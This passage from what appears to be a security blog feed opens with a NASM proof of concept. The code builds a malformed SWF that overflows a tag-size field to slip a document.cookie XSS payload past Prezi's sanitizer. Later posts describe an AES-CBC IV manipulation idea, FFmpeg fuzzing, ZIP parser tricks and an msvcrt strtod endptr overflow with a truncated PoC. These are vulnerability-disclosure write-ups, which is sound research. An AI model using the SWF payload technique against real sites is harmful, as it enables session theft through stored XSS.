The final setup looked like this (in the data of the hidden chunks the sanitizer was sent to EOF of course):

The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0

; SWF file

; ----------------------- HEADERS
db "FWS"
db 6 ; version 6

dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
dw (%2 | %1 <<6)
%endmacro

%macro TAG_LONG 2
dw (0x3f | %1 << 6)
dd .end - ($ + 4)
%endmacro

%macro TAG_LONG_MANUAL 2
dw (0x3f | %1 << 6)
dd %2
%endmacro

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
db 0x83
dw .StringsEnd1 - ($ + 2) ; Size
db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
db '"   '
; It's here. Well, send it back to the void or something.
db 0x3f ; Long tag size. (it's actually '?')
db ':' ; Tag ID. Whatever.
db '    ' ; 0x20202020 - this should be enough to get rid of it for good.
db '" + ' ; And we're done here.
; Let's continue where we left off, shall we?
db "document.cookie);", 0
db "", 0 ; _blank
.ActionsEnd: db 0 ; EndOfAction Flag

TAG_SHORT TAG_ShowFrame, 0

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so there's no sense in thinking too much about it I guess; especially since it worked:

Again, I would classify this as a stored/wormable XSS.

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from * (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because AES in CBC mode works like this:
  1. Take the next 16-byte block.
  2. Decrypt the block using AES KEY and AES algorithm.
  3. XOR the result with the 16-byte IV and that's the decrypted block.
  4. GOTO 1 until end of data.
So basically:
  1. We know the result of the decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So, basically, we choose the result of the decryption of the first block* (and get trashed data in all the other blocks).
* - actually, if we think of the data as 16-byte rows, then we control one byte in each column, in a row of our choice; all bytes don't have to be in the same row.
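The first-block trick can be sketched in a few lines. Python's standard library has no AES, so the sketch below swaps in a toy Feistel permutation (`toy_block_decrypt`, a made-up stand-in, NOT AES); the IV arithmetic is the same for any block cipher, because the first plaintext block is always "block decryption of the first ciphertext block, XORed with the IV". The key, the ciphertext bytes and the wanted header are all invented for illustration.

```python
import hashlib

BLOCK_SIZE = 16


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_decrypt(key, block):
    """Toy 4-round Feistel permutation standing in for AES block decryption."""
    left, right = block[:8], block[8:]
    for round_no in range(4):
        mask = hashlib.sha256(key + bytes([round_no]) + right).digest()[:8]
        left, right = right, xor_bytes(left, mask)
    return left + right


def decrypt_first_block(key, iv, first_cipher_block):
    """First CBC block: block-decrypt, then XOR with the IV."""
    return xor_bytes(toy_block_decrypt(key, first_cipher_block), iv)


def forge_iv(key, first_cipher_block, wanted_plaintext):
    """Pick the IV that turns the first block into `wanted_plaintext`."""
    return xor_bytes(toy_block_decrypt(key, first_cipher_block), wanted_plaintext)


# Made-up stand-in for the first 16 encrypted bytes of main-*.swf.
first_cipher_block = bytes(range(BLOCK_SIZE))
key = b"any 16-byte key!"                 # attacker-chosen, value is irrelevant
wanted = b"FWS\x06" + b"A" * 12           # 16 bytes we want to see after decryption

forged_iv = forge_iv(key, first_cipher_block, wanted)
forged_first_block = decrypt_first_block(key, forged_iv, first_cipher_block)
print(forged_first_block == wanted)
```

Whatever key is used, the attacker only has to decrypt the first block once and XOR the result with the bytes they want; no brute forcing is involved for these 16 bytes.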

There are a couple of important things to note:
  • The IV gives us only 16 bytes to control.
  • With some AES key brute-forcing it might be possible to control an additional 2-5 bytes - however, the time needed to get the additional bytes grows exponentially - it's basically 256**N operations (AES decryptions), where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of the padding length (e.g. 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroyed. This can be bypassed by choosing such an IV that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).
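To put the 256**N figure into perspective, here is a back-of-the-envelope sketch. The decryption rate is a purely hypothetical number chosen for illustration (it is not a measurement), and the function names are made up.

```python
# Rough cost of brute-forcing the AES key to fix N extra plaintext bytes.
ASSUMED_DECRYPTIONS_PER_SECOND = 10_000_000  # hypothetical rate, not measured


def brute_force_trials(extra_bytes):
    """Expected number of key trials to hit N specific byte values."""
    return 256 ** extra_bytes


def estimated_seconds(extra_bytes, rate=ASSUMED_DECRYPTIONS_PER_SECOND):
    return brute_force_trials(extra_bytes) / rate


for n in range(1, 6):
    print(n, "extra bytes:", brute_force_trials(n), "trials,",
          round(estimated_seconds(n), 3), "s at the assumed rate")
```

Each extra byte multiplies the work by 256, which is why 2-5 bytes is roughly where this stops being practical.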

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and open-source SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from a process' (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Video recording of my Data, data, data! reverse-engineering webinar

By Gynvael Coldwind | Wed, 19 Mar 2014 00:08:51 +0100 | @domain:
As you probably know, we ran into some serious technical problems during the webinar (who would suspect a Hangouts outage, huh), which caused a 40-minute delay, a change of platform and some minor problems on the line (like the lack of a recording). So, as promised, I recorded the talk again and have just posted it on YouTube, to be enjoyed by everyone who couldn't see the live one or decided to wait for the video for other reasons (the technical problems being a good one).

Context: please refer to this post.

"Data, data, data! I can't make bricks without clay." A few practical notes on reverse-engineering.

Direct YouTube link: click

The talk was done as part of Garage4Hackers Ranchoddas Series.

Slides: here
Scripts, etc: here

Once again sorry for the technical issues during the live talk.
Let me know what you think about the talk (questions are welcome as well) :)


C++ symbols in debian/symbols files - symbol export maps

By sil2100 | Mon, 17 Mar 2014 20:04:00 GMT | @domain:
When developing a C++ library that we later intend to provide by means of a Debian package, there are certain things that make it really complicated and hard to maintain. Everyone who has had to deal with debian/symbols in a C++ library knows how troublesome it is. The biggest problem besides name mangling: symbol leakage. By default the GNU ELF linker exports everything, leading to maintenance hell. Sadly, this has to be dealt with at the source level - the best way? Symbol export maps.

A free webinar on Reverse Engineering

By Gynvael Coldwind | Tue, 11 Mar 2014 00:08:48 +0100 | @domain:
Next week I will be doing a free webinar on Reverse Engineering - "Data, data, data! I can't make bricks without clay."*. I will focus on practical RE tips and tricks I'm using day-to-day, which generally speed up the whole process or are simply cool (imo). The webinar will be hosted by Garage4Hackers as part of the Ranchoddas Series; see the details below.

Title: "Data, data, data! I can't make bricks without clay."* A few practical notes on reverse-engineering.
* Sir Arthur Conan Doyle, The Adventure of the Copper Beeches (one of the Sherlock Holmes short stories)

Date: 17 March 2014
Time (Switzerland/EU aka UTC+01:00 aka CET aka GMT +1:00): 18:00
Time (IST aka GMT +5:30): 22:30
Time (other places):
Duration: TBD, but something between 45-60 minutes + time for questions

Video stream: or
Questions / chat: #g4h @ (or via web:

Registration link: click
(We will be sending out the video link via e-mail, once we have it - probably just before the webinar; we'll also post that link on G4H forum/facebook/twitter + probably around here.)

The presentation will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool - most of it can be applied on any architecture or operating system.

Examples of topics:
- how to start with an unknown architecture
- debugger scripting
- creating your own useful tools
- etc

Prerequisites:
- some reverse-engineering experience or general interest in reverse-engineering
- basic programming skills
- basic knowledge of how the CPU and operating systems work


Big thanks to Garage4Hackers Team for organizing this!

Let me know if you are planning to attend and see you there :)

My first ever podcast in English - solving Binathlon 400 CTF crackme

By Gynvael Coldwind | Mon, 17 Feb 2014 00:08:47 +0100 | @domain:
As some of you may know, I've published a little over a hundred podcasts in my native language, and it seems I finally got around to recording something in English. The podcast is about one of the solutions (and a lazy one at that) to the "HackMe" Binathlon 400 task (it was basically a ZX Spectrum crackme) from the Olympic CTF Sochi 2014 run by the MSLC.

I hope you'll enjoy the video. Feel free to ask any questions (ideally in the YouTube comments) with regards to the task that you have.

If you like the idea of me recording podcasts on security, reverse-engineering and programming-related topics, let me know - I might make a habit out of it.

Node.js gamepad driver

By xa | Sat, 01 Feb 2014 22:25:00 GMT | @domain:

Node.js gamepad in action

Some time ago I wanted to play an old-school game with my gamepad, and of course I could not find it. The solution? Create my own gamepad, but with my limited hardware skills that would be a little bit difficult. The next best thing: use a touch-capable device. But it quickly turned out that it would not be so easy. It’s not a problem when the HTML5 gamepad controls an HTML5 game on the same server/browser, but what about native games? A driver would be needed for that, and my level of expertise in that area was the same as in the hardware-building mumbo-jumbo. My experimental “driver” had two main goals: to run on Ubuntu and to be built in Node.js.

The following post is not a tutorial, so I’m not covering the subject from top to bottom, but I’m providing a great starting point. This should give you some idea of how things work and what to expect from such a device. At the end I’m linking to a Node.js application which acts like a device driver. This app is not in any way a production-ready solution, only an experiment, so keep in mind that there are many bugs and that there is a high possibility that it will not run on your system (I’ve created and tested it only on Ubuntu 13.10).

Fun with antigravity

By xa | Tue, 28 Jan 2014 22:00:00 GMT | @domain:

Some time ago, I needed a simple crowd algorithm for a project of mine. In that project there was a bunch of entities which were moving towards a common target. Everything was alright until those entities got close to the target and to each other - every entity ended up placed at the same point at the target. I tried to implement some collision detection for every entity, so that if one entity detected that it was colliding with another one, it would stop moving and wait for the second entity to go away. But when there were multiple entities in close proximity, almost everyone would wait for everyone.

The solution for a simple, almost dumb crowd simulation was very close. Every entity, instead of stopping and waiting, should apply a reverse force which depends on the proximity to a nearby entity. That approach is the opposite of gravity - antigravity.
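A minimal sketch of that idea is shown below. It is not the code from the project: the function name, the linear falloff of the push and all the constants (`speed`, `radius`, `strength`) are assumptions made for illustration.

```python
import math


def antigravity_step(positions, target, speed=1.0, radius=5.0, strength=2.0):
    """Advance every entity one step: pull towards target, push away from neighbours."""
    new_positions = []
    for i, (x, y) in enumerate(positions):
        # Attraction: move towards the common target, at most `speed` per step.
        dx, dy = target[0] - x, target[1] - y
        dist = math.hypot(dx, dy)
        vx = vy = 0.0
        if dist > 1e-9:
            step = min(speed, dist)
            vx, vy = dx / dist * step, dy / dist * step

        # Antigravity: every neighbour inside `radius` pushes this entity away,
        # the closer it is, the stronger the push (assumed linear falloff).
        for j, (ox, oy) in enumerate(positions):
            if i == j:
                continue
            rx, ry = x - ox, y - oy
            d = math.hypot(rx, ry)
            if 1e-9 < d < radius:
                push = strength * (radius - d) / radius
                vx += rx / d * push
                vy += ry / d * push

        new_positions.append((x + vx, y + vy))
    return new_positions


crowd = [(0.0, 0.5), (0.0, -0.5)]
print(antigravity_step(crowd, target=(0.0, 0.0)))
```

With these assumed constants two entities sitting almost on top of each other at the target are pushed apart instead of freezing, while a lone entity simply walks towards the target.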

The result of this algorithm can be seen above, with some presets for particle behaviors ranging from "crowd" and "jelly" to "bacteria". Such a simple solution can create a great range of possibilities. Of course this is nowhere near a full-blown crowd simulation with advanced agent AI, but for my small project the antigravity did a great job.

Appmenu Qt5: patches and the release candidate

By sil2100 | Tue, 14 Jan 2014 16:29:00 GMT | @domain:
Happy new year! I hope this post will be the last one in the 'Appmenu for Qt5' series. The holidays have passed and all my required patches have now been successfully merged into the upstream Qt repositories. This means that, according to our current policy, we can now cherry-pick those patches to the Qt5 versions that are used in Ubuntu. Therefore, the Ubuntu Qt 5.2 packages, which are still being prepared, are already shipping my changes as quilt patches, enabling proper appmenu-qt5 support. All is ready for testing.

FFmpeg and a thousand fixes

By j00ru | Fri, 10 Jan 2014 16:44:13 +0000 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog). Following more than two years of work, the day has finally come – the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project […]

FFmpeg and a thousand fixes

By Gynvael Coldwind | Fri, 10 Jan 2014 00:08:44 +0100 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog).
Following more than two years of work, the day has finally come - the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project thus far:

$ git log | grep Jurczyk | grep -c Coldwind

As this event clearly marks an important day in our ongoing fuzzing effort, we decided to provide you with some background on one of the activities we are currently working on.

FFmpeg repository logs with a lot of Found-by: j00ru and Gynvael

At Google, security is a top priority -- not only for our own products, but across the entire Internet. That’s why members of the Google Security Team and other Googlers frequently perform audits of software and report the resulting findings to the respective vendors or maintainers, as shown in the official “Vulnerabilities - Application Security” list. We also try to employ the extensive computing power of our data centers in order to solve some of the security challenges by performing large-scale automated testing, commonly known as fuzzing.

Back in December 2011 we were really inspired by Tobias Klein, his "Bug Hunter's Diary" book and specifically the "NULL POINTER FTW" section discussing the discovery and exploitation process of a write-what-where condition vulnerability identified by the author in one of the FFmpeg demuxers responsible for parsing 4X Media ("4xm" in short), with its source code residing in the "libavformat/4xm.c" source file. The security flaw was not difficult to find through manual analysis, since the affected code was contained within several continuous lines of text; while it was just a single example of a trivial programming error, it got us thinking. After all, if there was a simple vulnerability in a C module of less than 400 lines of code performing a relatively simple task, chances were there could have been more similar or less obvious problems in the entire FFmpeg codebase, currently at about 832,000 lines of code (and definitely with more than 0.5MLOC back at the time).

While reading about the 4xm demuxer vulnerability, we thought that we could help FFmpeg eliminate many potential low-hanging problems from the code by making use of the Google fleet and fuzzing infrastructure we already had in place. There were also several other reasons why we decided that taking the project as a fuzzing target would be a good idea:
  • FFmpeg had a history of reliability and security issues prior to Tobias' discovery, see FFmpeg Security website.
  • Feeding input to the software and triggering relevant code paths was as trivial as using the standalone ffmpeg executable with appropriate command line options.
  • The project was strictly about parsing complex, often proprietary file format structures in native C code - essentially, a paradise for any bug hunter. There were lots of dynamic allocations, arithmetic operations, indexing buffers based on input data, moving memory around and other operations known to be frequently prone to various types of programming mistakes. As a bonus, different parsing modules were developed by different contributors, typically with varying security awareness.
  • Input data was readily available - the internet was full of audio/video files in a variety of formats and encoded with different codecs. There were also dedicated corpuses of files designed to be used for media decoder testing. Two examples of such data sets are and the FFmpeg FATE project.
  • Roughly at the same time the Google-developed AddressSanitizer run-time memory error detector was gaining recognition. The utility offered instant and accurate detection of common classes of memory-related problems such as out-of-bounds read and write access to {stack, heap, static} arrays, use-after-free, invalid free, double free and more, at the cost of a 2-3x average slow down and some insignificant memory overhead. The utility seemed to be a perfect candidate for improving the detection rate of fuzzing-incurred errors which would otherwise not be detected at all or would manifest themselves in areas of code completely unrelated to the root cause location.
  • As a bonus, the ASan team decided to make it compatible with FFmpeg at early stages of the development and later ran the ASan-instrumented FFmpeg over a set of valid input files (not malformed or mutated in any way). Only by doing this, they were able to identify four bugs (see "Found Bugs"), providing us with more evidence that the codebase might require further investigation in search of programming errors in dealing with incorrectly formatted input bitstreams.
All of the above arguments discuss how the nature of FFmpeg made it suitable for automated testing, but there is also the matter of whether finding and having bugs fixed in the product is worthwhile, or precisely, who would benefit from the improved security posture of the project. FFmpeg and its derivatives (such as the spin-off Libav project) are the foundation of many other media-processing programs used both by desktop PC users and companies alike. For a fairly comprehensive list of products built upon, relying on or using parts of FFmpeg, see; notable examples include Google Chrome, MPlayer, VLC and xine. As a result, it was expected that any discovered and fixed bug would make millions of users directly or indirectly more secure, being enough of a justification to proceed and take the effort from idea to realization.

Before any fuzzing actually takes place, it is usually crucial for the success of the operation to gather a set of files with extensive code coverage, so that more (potentially unexpected) program states can be triggered during the fuzzing itself, spun off the original coverage. We approached the problem by collecting around 7,000 sample media files from the aforementioned website and the FFmpeg FATE regression test suite, later adding more exotic files from the public web in order to further improve the subset of formats and codecs covered by the corpus. Once we were finally happy with the total number of basic blocks touched while processing the test cases (being a good measure of the total code coverage achieved), we made use of some 2,000 cores and relatively simple algorithms (such as bitflipping, swapping bytes, truncating the files and so forth) to mutate the input data, feed it to FFmpeg and save information about any resulting crashes.
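To give an idea of how simple such mutation algorithms can be, here is a minimal sketch of the three strategies named above. It is not the fuzzer used in this effort; the function names, the default mutation ratio and the number of swaps are all assumptions made for illustration.

```python
import random


def bitflip(data, rng, ratio=0.01):
    """Flip single bits at random positions (about `ratio` flips per byte)."""
    out = bytearray(data)
    if not out:
        return bytes(out)
    for _ in range(max(1, int(len(out) * ratio))):
        out[rng.randrange(len(out))] ^= 1 << rng.randrange(8)
    return bytes(out)


def swap_bytes(data, rng, swaps=4):
    """Exchange the contents of a few randomly chosen byte pairs."""
    out = bytearray(data)
    if len(out) < 2:
        return bytes(out)
    for _ in range(swaps):
        a, b = rng.randrange(len(out)), rng.randrange(len(out))
        out[a], out[b] = out[b], out[a]
    return bytes(out)


def truncate(data, rng):
    """Cut the file short at a random offset."""
    if len(data) < 2:
        return data
    return data[:rng.randrange(1, len(data))]


MUTATORS = (bitflip, swap_bytes, truncate)


def mutate(data, rng):
    """Apply one randomly chosen mutation strategy."""
    return rng.choice(MUTATORS)(data, rng)


sample = bytes(range(256)) * 4   # stand-in for a real media file
rng = random.Random(1234)        # fixed seed so a crashing input can be reproduced
mutants = [mutate(sample, rng) for _ in range(5)]
print([len(m) for m in mutants])
```

In a real setup each mutant would be written to disk, fed to the ffmpeg executable, and kept only if the run crashed or tripped a sanitizer report.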

The first fuzzing iteration ran for approximately one week and was able to uncover around 130 unique problems in the code, ranging from simple assertion failures to stack-based buffer overflows and other severe conditions:
  • NULL pointer dereferences,
  • Invalid pointer arithmetic leading to SIGSEGV due to unmapped memory access,
  • Out-of-bounds reads and writes to stack, heap and static-based arrays,
  • Invalid free() calls,
  • Double free() calls over the same pointer,
  • Division errors,
  • Assertion failures,
  • Use of uninitialized memory.
Our personal feeling is that between 10% and 20% of the problems could be considered easily exploitable security issues; however, the estimation has not been formally confirmed in any way.

We subsequently contacted the project maintainer - Michael Niedermayer - who submitted the first fix on the 24th of January, 2012 (see commit c77be3a35a0160d6af88056b0899f120f2eef38e). Since then, we have carried out several dozen fuzzing iterations (each typically resulting in fewer crashes than the previous ones) over the last two years using similar resources, occasionally improving our original corpus and tweaking the mutation configuration (e.g. fiddling with mutation ratios or getting them to match the internal structure of the tested files). Ever since we started the effort, we have been working closely with Michael, who has been extremely keen to work with us and fix all issues we would send his way. The numbers speak for themselves - out of over a thousand commits submitted to FFmpeg as fixes to our findings, at least 750 were authored by Michael, which gives an outstanding average of one commit every single day for the last 23 months! We would like to thank him for all the work he has done and continues to do to improve the stability and security of the product; finding the bugs is just the start of a success.

The other ~350 commits in FFmpeg were mostly submitted by Libav project developers: Ronald S. Bultje, Luca Barbato, Alex Converse, Martin Storsjö and Anton Khirnov. We have been concurrently reporting issues in Libav during the last several months and similarly to FFmpeg, the maintainers are doing a great job writing and submitting patches, which FFmpeg is also cherry-picking to their own git repository (large chunks of the two projects are shared, as Libav started as a fork of FFmpeg). While the former project is doing their best to catch up with the latter, the figures speak for themselves again: there are "only" 413 commits tagged "Jurczyk" or “Coldwind” in Libav, so even though some of the FFmpeg bugs might not apply to Libav, there are still many unresolved issues there which are already fixed in FFmpeg. Consequently, we advise users to use the FFmpeg upstream code where possible, or the latest stable version (currently 2.1.1) otherwise. It is also a good idea to carefully consider which formats and codecs are necessary for your use case and disable all other parsers during compilation time, in order to reduce the attack surface to a minimum.

We are presently still improving our corpus and fuzzing methods and will continue to work with both FFmpeg and Libav to ensure the highest quality of the software as used by millions of users behind multiple media players. If interested in the effort, please keep an eye on the master branches for commits marked as "Found by Mateusz "j00ru" Jurczyk and Gynvael Coldwind" and watch out for new stable versions of the software packages. Hopefully, one day we will be able to declare both projects "fuzz clean" against most publicly available samples and simple mutation algorithms. Until then, we recommend refraining from using either of the two projects to process untrusted media files or, where absolutely required, using privilege separation on your PC or production environment.

Complete lists of developers who have ever submitted patches for bugs we identified in FFmpeg and Libav are shown below (sorted by the number of commits). They clearly illustrate that as of today, FFmpeg includes virtually all fixes developed for Libav, while Libav only has 50 out of a total of 750 of Michael's commits (as previously mentioned, not all FFmpeg bugs affect Libav in the first place, though).

FFmpeg:
    750 Michael Niedermayer
    108 Ronald S. Bultje
     91 Luca Barbato
     77 Martin Storsjö
     48 Anton Khirnov
     29 Alex Converse
      5 Kostya Shishkov
      4 Thilo Borgmann
      1 Vitor Sessak
      1 Reinhard Tartler
      1 Paul B Mahol
      1 Mashiat Sarker Shakkhar
      1 Mans Rullgard
      1 Justin Ruggles
      1 Janne Grunau
      1 Aurelien Jacobs

Libav:
    107 Ronald S. Bultje
     89 Luca Barbato
     77 Martin Storsjö
     50 Michael Niedermayer
     48 Anton Khirnov
     27 Alex Converse
      5 Kostya Shishkov
      2 Thilo Borgmann
      1 Vitor Sessak
      1 Reinhard Tartler
      1 Paul B Mahol
      1 Mashiat Sarker Shakkhar
      1 Mans Rullgard
      1 Justin Ruggles
      1 Janne Grunau
      1 Aurelien Jacobs

We would like to thank all of the above developers for their hard work on making both media libraries better with every single day.

English version of my ZIP-format slides

By Gynvael Coldwind | Wed, 04 Dec 2013 00:08:43 +0100 | @domain:
Ange reminded me that I never published the English version of the slides from my "Ten Thousand Traps: ZIP, RAR, etc" talk. I gave the talk in May this year, in Krakow, at a small Polish conference called SEConference. Apart from the slides there are also several "weird" ZIP examples, including a "schizophrenic" one (as Ange calls them - and it's an accurate and easy to remember name), which seems to contain different files when viewed with various ZIP parsers/libraries/unpackers (see slides 24 to 27 for results).

Download links:

the slides (2.8 Mb)
the weird zips (14 Kb)

I don't have this talk recorded in English, but you can see the demos in the recording of my Polish talk (in Polish) - see below.

• DEMO 1 at 2:00 - Unreal Commander exploit (ZIP unpack path traversal into DLL spoofing due to wrong directory privileges).
• DEMO 2 at 12:23 - viewed from Python, PHP and Java.
• DEMO 3 at 18:18 - File names in ZIP, exploit from DEMO 1 explained.
• DEMO 4 at 21:15 - Files with same name in ZIP.
• DEMO 5 at 26:10 - Memory content disclosure in Unreal Commander.

And that's it.

P.S. If you're into ZIP files, you might want to check out the Android "Master Key" bug (and other) - just google for it.

Windows msvcr*.dll 64-bit strtod endptr integer overflow

By Gynvael Coldwind | Sat, 23 Nov 2013 00:08:41 +0100 | @domain:
Some time ago I was reading a random Python JSON parsing library which was partly implemented in C. At one point I thought I spotted a bug in custom float number parsing - I've written a short PoC to trigger it and it worked (i.e. crashed Python), but behaved differently than I expected it to and seemed to work only on Windows. So I got back to looking at the code and in the end decided it was only my imagination - there was no bug. So… why did that PoC actually work? It turned out that in some cases the library fell back to using the good-old strtod for float parsing instead and yes, there was a bug - in the underlying msvcrt.dll strtod implementation.


  • strtod et al. (string-to-double) have a char **endptr output parameter, in which they store the address of the next character after the parsed/converted-to-double number in the input buffer. This parameter is used by parsers to determine where to continue parsing after a number has been read.
  • Since internally strtod (or actually _fltin2 and _wfltin2 which are used deep inside) uses a 32-bit int type to store the number-of-parsed-characters, the final calculation of endptr (startptr + number-of-parsed-characters) may result in an address that is outside (in front) of the input text buffer on 64-bit systems.
  • This results in introducing DoS class, information leak class, or other types of bugs in parsers that rely on strtod and the endptr parameter.

Note: Neither the glibc nor the MinGW (statically linked) strtod implementation has this bug - it's msvcr*.dll specific.
Note 2: PoCs are at the bottom.

Root cause

The direct problem is in the _flt structure used by the _fltin2 and _wfltin2 functions, which do the actual string-to-double conversion in strtod/etc (see Affected versions and functions below). This structure looks as follows (Visual C++ CRT source code, file \crt\src\fltintrn.h):

typedef struct _flt
{
    int flags;
    int nbytes; /* number of characters read */
    long lval;
    double dval; /* the returned floating point number */
} *FLT;

This causes problems with overly long numbers on 64-bit platforms, since the nbytes might overflow (for numbers of length >= 2GB and < 4GB, etc), which leads to it having a negative or zero value.

This is problematic for strtod/et al., since they calculate the *endptr value in the following way (\crt\src\strtod.c):

struct _flt answerstruct;
FLT answer;
answer = _fltin2( &answerstruct, ptr, _loc_update.GetLocaleT());

if ( endptr != NULL )
*endptr = (char *) ptr + answer->nbytes;

A reasonably common way to use strtod in parsers (think: a JSON/XML/CSV/etc parser) is to do something like this:

if (looks_like_a_double(p)) {
    char *ep;
    val = strtod(p, &ep);
    // errno checking / usage of val here
    p = ep; // continue parsing right after the number
}

This in fact leads to p pointing outside of the buffer (up to 2GB in front of the buffer) and the parsing continues there.
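The pointer arithmetic can be replayed without a 64-bit Windows box. The sketch below only models the calculation described above (a character count squeezed into a signed 32-bit int and then added to a 64-bit pointer); it does not call the CRT, the function names are made up, and the start address is just an example value.

```python
import ctypes

MASK64 = (1 << 64) - 1


def correct_endptr(start, parsed_chars):
    """What endptr should be: start plus the full character count."""
    return (start + parsed_chars) & MASK64


def msvcrt_style_endptr(start, parsed_chars):
    """Model of the bug: the count passes through a signed 32-bit nbytes field."""
    nbytes = ctypes.c_int32(parsed_chars).value  # wraps like a C int
    return (start + nbytes) & MASK64


start = 0x7FFF0040          # example buffer address
parsed = 0x80000015         # a little over 2 GB of digits

print(hex(correct_endptr(start, parsed)))       # 0xffff0055
print(hex(msvcrt_style_endptr(start, parsed)))  # 0xffffffffffff0055

# A count of exactly 4 GB wraps to zero, so the "end" pointer equals the start.
print(msvcrt_style_endptr(start, 0x100000000) == start)  # True
```

The second value is a non-canonical address far in front of the buffer, and the last case is the one where a parser would keep re-reading the same number forever.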


Since this is a low-level library function, the impact depends on what it is used for. Here are a couple of examples (assuming that strtod is part of a parser that is passed untrusted input, e.g. a JSON or CSV file):
  • Infinite loop DoS - if the input string is 4 GB long, the resulting end pointer will be identical to the start pointer, so the parser will enter an infinite loop (strtod doesn't report any errors of course, since the number is correctly parsed)
  • Crash DoS - setting the end pointer so that it points to unallocated memory (e.g. for a number of length 2GB the end pointer will be the start pointer minus 2GB, which probably points to some unallocated memory or isn't even a canonical pointer)
  • Information disclosure - since you could redirect the "read pointer" of the parser to any buffer in memory that is on lower addresses than the start pointer, you could make it read arbitrary data from memory; if the read data would be later reflected back, you could fetch it back.
  • Other - there might be other, less probable (but still possible) examples; one would be a more complicated scenario where the parsed text (code) is verified beforehand, and then parsed and executed. In such case this bug could be used to redirect the parser to jump into e.g. a middle of the string/comment containing unsafe code (similar to jumping in the middle of an instruction in ROP, but on scripting language level). This would make an awesome CTF challenge, but I don't expect it to be found in real products.

Affected versions and functions

64-bit Windows only.

This has been confirmed on:
  • default, fully patched Windows 7 msvcrt.dll
  • msvcr90.dll, msvcr110.dll
  • newest Visual Studio 2013 redistributables msvcr120.dll
  • Windows 8.1 (preview) default msvcrt.dll
I guess we can extrapolate this to "all 64-bit versions".

Affected functions (generally: everything that directly or indirectly uses _flt.nbytes for anything meaningful):
  • _fltin2/_wfltin2 - these incorrectly calculate the _flt.nbytes
  • _strtod_l/_wcstod_l - these directly use _flt.nbytes
  • strtod/wcstod - these are just wrappers for the above functions
  • _Stodx/_Stod/_Stofx/_Stof - these use strtod
Worth looking for variants (e.g. __strgtold12_l/__strgtold12?).

Proof of concept

This proof of concept prints the correct end pointer and the one returned by strtod.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {

    // SZ == INT_MAX + some more bytes
    #define SZ 0x80000016

